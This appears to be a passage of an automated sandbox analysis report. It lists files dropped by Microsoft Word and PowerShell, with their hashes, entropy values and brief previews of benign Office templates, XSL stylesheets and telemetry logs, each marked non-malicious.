                                                                                                                                                        SHA-256:BDFD061C043CF92295A06C4F0C87F022C346725030F563174AE46DC7D2E87964
                                                                                                                                                        SHA-512:47B1399E65E06BA065772B054D665342AA06F09D9B9CA955A709928E099BE8809835F9150EF39F2EF6BC113FE965A2AACF018B7D3083C8DFEA9B2AC8CE9964B2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2684
                                                                                                                                                        Entropy (8bit):3.9103020870302796
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:uiTrlKxJxTxl9Il8utr4Z5Dg5qGJeZwBnfkvQdPbznvU0zd/vc:iYrrCfGDJxbznvvu
                                                                                                                                                        MD5:BA31C566AE2E67DD4F789FBB6C1BD541
                                                                                                                                                        SHA1:34B02C6085092EAC5C110A3C49638520A3E62063
                                                                                                                                                        SHA-256:55D2DFCFCD51E99A89A2148FF945F02BCF532C9FDDB1D0A7B1CC1F558693192E
                                                                                                                                                        SHA-512:3C0514FC6FFAD07777457E2E354AB375C56C28B4D32C7069A518E27769C875CB87D9FCE013DDF811A9C5879B04FC39DFEAE6603157A241FDC9CF0441756396BC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4542
                                                                                                                                                        Entropy (8bit):4.001180058513251
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:xIYra/01Knoh/P+HviIg4kCZS/ldGR5HJzMltmimUS:xIe91miIdkRtIR5DF
                                                                                                                                                        MD5:73A657A1A36CE119BAB007F50F6E7F8C
                                                                                                                                                        SHA1:C6440D286734C361754A81F7A51C996C6B9C7974
                                                                                                                                                        SHA-256:A6FB8006489B40FEC33BBC37587EE9CF79BE950F1325D0FBF4CD65CF37F0D1EA
                                                                                                                                                        SHA-512:E621F01F4B9FCB27FFE30F1E45CEADB9AC218243054C65D6614ECB05FD7A35D6224B28760C76A60F6DC7CC7425EC07F7D7CB41E7CA762625928FB3FEDC6A4666
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1024
                                                                                                                                                        Entropy (8bit):0.05194905805374581
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:1lvlxlln:vz
                                                                                                                                                        MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                                                                                                                                                        SHA1:D15075354757A59DE6E057435511D956663955FB
                                                                                                                                                        SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                                                                                                                                                        SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):11608
                                                                                                                                                        Entropy (8bit):4.8908305915084105
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                                                                                                        MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                                                                                                        SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                                                                                                        SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                                                                                                        SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):64
                                                                                                                                                        Entropy (8bit):1.1510207563435464
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:NlllulBkXj:NllUS
                                                                                                                                                        MD5:453075887941F85A80949CDBA8D49A8B
                                                                                                                                                        SHA1:7B31CA484A80AA32BCC06FC3511547BCB1413826
                                                                                                                                                        SHA-256:84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
                                                                                                                                                        SHA-512:02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):20971520
                                                                                                                                                        Entropy (8bit):0.016896224754793916
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:8DT9CjEtvG9ogFITl2DjJl10Zf+mBWjrz+6ng5gMB5:a
                                                                                                                                                        MD5:D04C1FA3B959E9808BFD4B342EC68C83
                                                                                                                                                        SHA1:01C67F860E68A97D57AC2BE3B4BDCFDA71A961D3
                                                                                                                                                        SHA-256:D24859A3ED26394440BDD99F681121C7427F3A1E870C9CE59C89145FEE37679C
                                                                                                                                                        SHA-512:561161ABEF6EBA0C8D5F93ED043CCFC5D5D365CCF27FB5E905431CE72A5CB8CEE18C2324C88CA555E726A45823EF95DBF54AEF8EED5E4B242C53CC41BC141356
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/19/2024 11:51:19.240.WINWORD (0x1E40).0x116C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-12-19T11:51:19.240Z","Contract":"Office.System.Activity","Activity.CV":"WIcacUtzYUSA6dDzDfrYMw.7.1","Activity.Duration":935,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...12/19/2024 11:51:19.240.WINWORD (0x1E40).0x116C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-12-19T11:51:19.240Z","Contract":"Office.System.Activity","Activity.CV":"WIcacUtzYUSA6dDzDfrYMw.7","Activity.Duration":9663,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureD
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):20971520
                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3::
                                                                                                                                                        MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                                        SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                                        SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                                                        SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):246
                                                                                                                                                        Entropy (8bit):3.5039994158393686
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                                                                                                                                        MD5:16711B951E1130126E240A6E4CC2E382
                                                                                                                                                        SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                                                                                                                                        SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                                                                                                                                        SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: TabbedArc.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3683
                                                                                                                                                        Entropy (8bit):7.772039166640107
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                                                        MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                                                        SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                                                        SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                                                        SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):260
                                                                                                                                                        Entropy (8bit):3.4895685222798054
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                                                                                                                                        MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                                                                                                                        SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                                                                                                                        SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                                                                                                                        SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: VaryingWidthList.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3075
                                                                                                                                                        Entropy (8bit):7.716021191059687
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                                        MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                                        SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                                        SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                                        SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):264
                                                                                                                                                        Entropy (8bit):3.4866056878458096
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                                                                                                                                        MD5:6C489D45F3B56845E68BE07EA804C698
                                                                                                                                                        SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                                                                                                                                        SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                                                                                                                                        SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: ThemePictureAccent.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6448
                                                                                                                                                        Entropy (8bit):7.897260397307811
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                                                        MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                                                        SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                                                        SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                                                        SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):254
                                                                                                                                                        Entropy (8bit):3.4721586910685547
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                                                                                                                                        MD5:4DD225E2A305B50AF39084CE568B8110
                                                                                                                                                        SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                                                                                                                        SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                                                                                                                        SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: chevronaccent.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4243
                                                                                                                                                        Entropy (8bit):7.824383764848892
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                                                        MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                                                        SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                                                        SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                                                        SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):252
                                                                                                                                                        Entropy (8bit):3.4680595384446202
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                                                                                                                                        MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                                                                                                                        SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                                                                                                                        SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                                                                                                                                        SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: architecture.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5783
                                                                                                                                                        Entropy (8bit):7.88616857639663
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                                        MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                                        SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                                        SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                                        SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):286
                                                                                                                                                        Entropy (8bit):3.4670546921349774
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                                                                                                                                        MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                                                                                                                        SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                                                                                                                                        SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                                                                                                                        SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                                                                                                                        Malicious:false
Preview:[File] | OriginalName: ThemePictureAlternatingAccent.glox | Component: WordFiles | ReqVer: 14 | StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5630
                                                                                                                                                        Entropy (8bit):7.87271654296772
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                                        MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                                        SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                                        SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                                        SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):256
                                                                                                                                                        Entropy (8bit):3.4842773155694724
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                                                                                                                                        MD5:923D406B2170497AD4832F0AD3403168
                                                                                                                                                        SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                                                                                                                        SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                                                                                                                        SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                                                                                                                        Malicious:false
Preview:[File] | OriginalName: ConvergingText.glox | Component: WordFiles | ReqVer: 14 | StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):11380
                                                                                                                                                        Entropy (8bit):7.891971054886943
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                                        MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                                        SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                                        SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                                                        SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):332
                                                                                                                                                        Entropy (8bit):3.4871192480632223
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                                                                                                                                        SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                                                                                                                                        SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                                                                                                                                        SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                                                                                                                                        Malicious:false
Preview:[File] | OriginalName: mlaseventheditionofficeonline.xsl | Component: WordFiles | ReqVer: 14 | Executable: {WD} | StoreLocation: {My Templates} | Command: /f {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):254875
                                                                                                                                                        Entropy (8bit):5.003842588822783
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                                                        MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                                                        SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                                                        SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                                                        SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):286
                                                                                                                                                        Entropy (8bit):3.5502940710609354
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                                                                                                                                        SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                                                                                                                                        SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                                                                                                                                        SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                                                                                                                                        Malicious:false
Preview:[File] | OriginalName: iso690.xsl | Component: WordFiles | ReqVer: 14 | Executable: {WD} | StoreLocation: {My Templates} | Command: /f {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):270198
                                                                                                                                                        Entropy (8bit):5.073814698282113
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                                                        MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                                                        SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                                                        SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                                                        SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                                                        Malicious:false
